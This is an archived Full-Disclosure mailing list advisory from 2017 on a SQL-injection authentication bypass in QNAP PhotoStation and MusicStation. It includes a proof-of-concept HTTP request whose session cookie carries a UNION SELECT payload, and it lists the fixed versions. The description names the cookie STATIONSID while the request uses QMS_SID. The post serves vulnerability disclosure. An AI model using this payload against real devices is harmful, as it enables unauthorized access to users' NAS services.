lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 10 May 2017 16:53:36 +0200
From: Kacper Szurek <kacperszurek@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication
	Bypass

# Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
# Date: 10.05.2017
# Software Link: https://www.qnap.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: web

1. Description

`$_COOKIE[STATIONSID]` is not escaped and then used inside SQL statement.

https://security.szurek.pl/qnap-photostation-524-musicstation-484-authentication-bypass.html

2. Proof of Concept

GET /photo/api/dmc.php HTTP/1.1
Host: qnap.host:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: QMS_SID=' UNION SELECT
9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999
-- a
Connection: close

3. Fix

Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists